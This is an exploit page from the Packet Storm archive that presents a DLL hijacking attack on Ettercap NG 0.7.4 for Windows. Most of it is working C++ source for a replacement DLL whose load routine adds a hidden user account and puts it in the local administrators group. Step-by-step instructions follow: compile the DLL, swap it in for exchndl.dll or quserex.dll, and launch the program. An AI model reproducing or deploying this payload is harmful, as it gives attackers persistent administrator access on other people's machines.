exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ettercap NG 0.7.4 DLL Hijack

Ettercap NG 0.7.4 DLL Hijack
Posted Apr 26, 2012
Authored by nImaarek

Ettercap NG version 0.7.4 suffers from a DLL hijacking vulnerability.

tags | exploit
systems | windows
SHA-256 | d04c00509e1d3444d662e6b7f22e92825bfd705db741648e0c2385bed9551510

Ettercap NG 0.7.4 DLL Hijack

Change Mirror Download
Exploit Title: ettercap NG-0.7.4 Dll hijacking vulnerability (quserex.dll - exchndl.dll)
Date: Tuesday April 24
Author: nimaarek
Software Link: http://sourceforge.net/projects/ettercap/files/unofficial binaries/windows/
Version: NG-0.7.4
Tested on: Windows XP SP3

.__ __
____ |__| _____ _____ _____ _______ ____ | | __
/ \| |/ \\__ \ \__ \\_ __ \_/ __ \| |/ /
| | \ | Y Y \/ __ \_/ __ \| | \/\ ___/| <
|___| /__|__|_| (____ (____ /__| \___ >__|_ \
\/ \/ \/ \/ \/ \/

/*

Application Information:
Application: Ettercap.exe
Version: NG-0.7.4
Company Name: The EtterCap community, http://ettercap.sourceforge.net/
File Date: Tuesday April 24
Description: EtterCap sniffer
Operating System: Windows XP SP3
Total Extensions Verified: 2
Verified Extensions: htm;html;

=============================================================
//tested on Windows XP SP3
#include "stdafx.h"
#include "windows.h"
#include <cstdlib>

int main()
{
system("net user apuser appass /add");
system("net localgroup administrators apuser /add");
exit(0);
return 0;
}


BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
main();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}
=============================================================

Instructions:

1. Compile dll
2. Replace exchndl.dll Or quserex.dll in Ettercap directory with your newly compiled dll
3. Launch Ettercap
4. Bo0o0o0o0o0o0o0m !


Greet to my Lovely friends :
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+
|M|O|H|3|N|C|O|D|E|r| |a|n|d| |A|m|i|r| |N|e|m|a|t|i|
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close